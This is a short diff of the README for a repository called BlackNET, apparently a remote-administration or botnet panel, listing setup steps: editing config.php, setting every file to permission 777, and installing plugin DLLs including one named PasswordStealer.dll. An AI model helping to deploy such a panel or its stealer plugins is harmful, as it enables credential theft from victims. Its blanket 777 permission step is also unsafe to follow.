SkyN9ne/BlackNET/README.md

 4. Change the database information in config/config.php
 5. Change the "Panel URL" with your url in config/config.php
 6. Change all files and folders permission to 777
-7. Make Sure that all DLLs are included in Plugins Folder
+7. Make Sure that all dependencies are included in "plugins" folder
    + FileSearcher.dll
    + PasswordStealer.dll
    + PluginExample.dll